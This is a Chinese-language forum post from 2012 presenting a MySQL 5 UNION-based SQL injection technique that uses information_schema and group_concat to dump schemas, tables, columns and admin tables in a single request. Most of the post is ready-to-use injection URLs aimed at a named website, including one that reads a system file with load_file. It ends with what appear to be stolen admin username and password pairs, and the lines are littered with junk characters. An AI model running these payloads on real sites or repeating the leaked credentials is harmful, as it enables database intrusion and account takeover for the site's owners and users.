此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似 _, ~& G) U6 |6 {4 }+ U' y
但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人7 B8 D& I& l$ v: B: E" R
: m+ d' D, U5 x5 S2 P# ?2 F# ^' I4 o. m- L4 U X: q6 E& E1 Q
优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入
; X( z, V) K& Q1 [& K
4 I Q8 [: ]9 q: @8 D3 E5 ^缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...
2 |$ R8 h4 u, N8 e- A6 X0 Z+ J% O# p3 \4 O6 ~0 X
下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示- W v8 b* r% O4 m. c7 T3 I
在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ , + 等等3 U" S% X \: i1 ?5 S
U( a1 X: ]) b9 A) n+ `8 y# ]1 ]http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17) M0 O& D4 _3 G# X: L L$ z3 p
9 Y4 Z: \1 \- z- t读出所有库:
' t" m @( k; X, p6 e& Z0 u6 i1 xhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA( E* V. v$ s; m% c2 U: j' M$ u
; r" E2 P5 m4 ^4 t8 [ s6 |4 Y( k# z% ~5 V9 k0 K
* K7 W: u- t% S) o- S* r
读出所有表:; U7 @+ K8 _2 Q
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()! U8 [4 {# }' t4 ]6 e4 @
! G# F) E3 T, d0 O. c
读出所有表字段:* j$ w; x. u3 H0 v- Q: U5 \! u) y
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)2 Q6 Z3 H: Q" F; ~9 [ v* b
*/ (97,100,109,105,110)为admin的ascii码 依次类推, \! ~) G" p. |) v
2 s M1 G. g% b. }2 ^读出所有表字段里的内容:+ o( O: M* j2 j. [: s T! c* X3 K
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin
: t: c' J4 X7 g( [; V. U" V
7 _2 L. g! t2 m2 a; g. o
: Z. Z J7 C4 J
% ?% o! S$ Q/ i1 r, c( [& U* z- x9 C8 A% C
+ w3 Q$ \ m6 t
/ _# p* n& h" ~6 O! g5 X, Q0 Jhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23* m; A4 A# B+ V
; ]/ Q7 D/ t" ?* R: [
: N1 r) F; ~- k0 W# U
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23
% J h( t; L. O2 c# f
) w: K$ K2 q. K. D- Xhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23 x7 _2 ]3 a- ~4 G
1 E2 t6 i# `8 w4 s8 q9 R
3 r. z# ]& y( F# B: Mhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23
) s8 T. w4 v) F% Z2 \1 i7 @( A3 b9 v, ~% C0 H
; c7 k' s+ b1 t4 W* \% F/ ]
webmaster:dzb521123,simlab:simadmin20043233
* B3 r8 Q/ m3 Q: I! h7 v& E: o |
发表于 2012-9-13 16:37:34
收藏
支持
反对